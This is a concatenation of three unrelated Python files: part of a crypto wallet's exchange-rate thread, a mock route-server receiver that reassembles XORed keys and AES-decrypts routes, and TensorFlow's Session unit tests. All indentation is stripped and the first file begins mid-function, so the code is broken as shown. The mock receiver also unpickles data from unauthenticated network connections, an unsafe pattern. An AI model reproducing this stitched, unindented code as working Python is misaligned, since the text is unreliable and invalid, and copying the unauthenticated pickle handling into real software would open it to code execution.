with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
make_dir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout == 0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
member-receiver-mock-prio.py
|
__author__ = 'marco'
import argparse
import pickle
from multiprocessing.connection import Listener, Client
import os
import signal
import Queue
from threading import Thread
import sys
np = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if np not in sys.path:
sys.path.append(np)
import util.log
import subprocess
import json
from crypto_util import AESCipher
import multiprocessing as mp
import port_config
logger = util.log.getLogger('Mock-Host')
KEY_LENGTH = 16 # bytes
KEY_ID_SIZE = 16 # bits
KEY_HEX_LENGTH = 32 # number of hex of key, KEY_LENGTH * 2
KEY_AND_ID_HEX_LENGTH = 36 # number of hex of key and id, KEY_LENGTH * 2 + KEY_ID_SIZE / 4
DUMMY_KEY = "00000000000000000000000000000000"
RS1_MODE = 1
RS2_MODE = 2
class Host:
def __init__(self, asn_2_id_file):
logger.info("Initializing the Host.")
with open(asn_2_id_file, 'r') as f:
self.asn_2_id = json.load(f)
self.id_2_asn = [ '' for i in xrange(0, len(self.asn_2_id))]
for asn, as_id in self.asn_2_id.items():
self.id_2_asn[as_id] = asn
# connect to XRS Server
self.conn_to_rs1 = Client((port_config.process_assignement["rs1"], port_config.ports_assignment["rs1_send_mpc_output"]), authkey=None)
self.conn_to_rs2 = Client((port_config.process_assignement["rs2"], port_config.ports_assignment["rs2_send_mpc_output"]), authkey=None)
self.run = True
self.stop_received_from_one_rs = False
self.route_id_to_msges = {}
def start(self):
self.lock = mp.Manager().Lock()
self.receive_messages_th = Thread(target=self.receive_messages,args=[RS2_MODE])
self.receive_messages_th.setName( "receiver from rs2")
self.receive_messages_th.daemon = True
self.receive_messages_th.start()
self.receive_messages(RS1_MODE)
logger.debug("waiting for RS1_MODE thread")
self.receive_messages_th.join()
logger.debug("ending")
def receive_messages(self,mode):
conn=None
if mode == RS1_MODE:
conn = self.conn_to_rs1
else:
conn = self.conn_to_rs2
waiting = 0
# start the MPC process in background
i=0
while self.run:
# get messages
#try:
#if mode == RS1_MODE:
# print "waiting for message from RS1"
#else:
# print "waiting for message from RS2"
msg = conn.recv()
msg = pickle.loads(msg)
#if mode == RS1_MODE:
# print "Got message from RS1. " + str("stop" in msg)
#else:
# print "Got message from RS2. " + str("stop" in msg)
#except:
# pass
waiting = 0
if "stop" in msg:
logger.info("received stop message " + str(mode))
break
else:
self.lock.acquire()
logger.debug("received message for announcement_id " + str(msg["announcement_id"]))
if mode == RS1_MODE:
if msg["announcement_id"] not in self.route_id_to_msges:
self.route_id_to_msges[msg["announcement_id"]] = {}
self.route_id_to_msges[msg["announcement_id"]]["rs1"] = msg["key"]
self.route_id_to_msges[msg["announcement_id"]]["encrypted_route"] = msg["encrypted_route"]
self.route_id_to_msges[msg["announcement_id"]]["list_of_route_ids"] = msg["list_of_route_ids"]
else:
if msg["announcement_id"] not in self.route_id_to_msges:
self.route_id_to_msges[msg["announcement_id"]]={}
self.route_id_to_msges[msg["announcement_id"]]["rs2"] = msg["key"]
if "rs1" in self.route_id_to_msges[msg["announcement_id"]] and \
"rs2" in self.route_id_to_msges[msg["announcement_id"]]:
self.reconstruct_message(msg["announcement_id"])
pass
self.lock.release()
print "exiting receive message " + str(mode)
def reconstruct_message(self, announcement_id):
encrypted_route = self.route_id_to_msges[announcement_id]["encrypted_route"]
keys_from_rs1 = self.route_id_to_msges[announcement_id]["rs1"].decode("hex")
keys_from_rs2 = self.route_id_to_msges[announcement_id]["rs2"].decode("hex")
key = xor_strings(keys_from_rs1, keys_from_rs2).encode("hex")
list_of_route_ids = self.route_id_to_msges[announcement_id]["list_of_route_ids"]
#print "key1: " + self.route_id_to_msges[route_id]["rs1"]
#print "key2: " + self.route_id_to_msges[route_id]["rs2"]
logger.debug("key: " + key)
keys = []
ids = []
for i in range(0, len(key) / KEY_AND_ID_HEX_LENGTH):
keys.append(key[i * KEY_AND_ID_HEX_LENGTH: i * KEY_AND_ID_HEX_LENGTH + KEY_HEX_LENGTH])
ids.append(key[i * KEY_AND_ID_HEX_LENGTH + KEY_HEX_LENGTH: i * KEY_AND_ID_HEX_LENGTH + KEY_AND_ID_HEX_LENGTH])
logger.info("key received for route_id in list: " + ids[i])
#print "getting encrypted key:" + key
if keys[i] == DUMMY_KEY:
logger.info("BGP-speaker " + self.id_2_asn[i] + " received dummy key for announcement " + str(announcement_id))
pass
else:
logger.debug("ready to decrypt with key " + str(keys[i]))
cipher = AESCipher(keys[i].decode("hex"))
route_id = list_of_route_ids[int(ids[i], 16) - 1]
encrypted_route = self.route_id_to_msges[route_id]["encrypted_route"]
decrypted_object = cipher.decrypt(encrypted_route)
decrypted_route = pickle.loads(decrypted_object) # decrypt serialized route object
logger.info("decrypted route: " + str(decrypted_route))
logger.info("BGP-speaker " + self.id_2_asn[i] + " decrypted route: " + str(decrypted_route.id) + " for announcement " + str(announcement_id))
def stop(self):
logger.info("Stopping.")
self.run = False
def xor_strings(xs, ys):
return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("asn_2_id_file", type=str, help="specify asn_2_id json file")
args = parser.parse_args()
pprs = Host(args.asn_2_id_file)
rs_thread = Thread(target=pprs.start)
rs_thread.daemon = True
rs_thread.start()
while rs_thread.is_alive():
try:
rs_thread.join(1)
except KeyboardInterrupt:
pprs.stop()
if __name__ == '__main__':
main()
|
session_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
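      # (the Session picks up the nodes added to the graph since the previous run)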
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
